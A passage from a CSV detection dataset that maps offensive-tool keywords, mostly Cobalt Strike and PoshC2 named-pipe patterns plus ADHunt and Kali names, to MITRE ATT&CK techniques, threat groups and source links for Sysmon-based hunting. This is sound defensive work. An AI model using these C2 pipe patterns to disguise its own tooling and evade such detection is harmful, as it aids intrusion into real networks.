replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\msrpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\MSSE-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\mypipe-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\netlogon_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\ntsvcs*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\PGMessagePipe*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\postex_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\postex_ssh_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\samr_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\scerpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\SearchTextHarvester*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\spoolss_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\srvsvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\status_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\UIA_PIPE*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\win\msrpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\winsock*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\Winsock2\CatalogChangeListener-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\wkssvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"\kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse 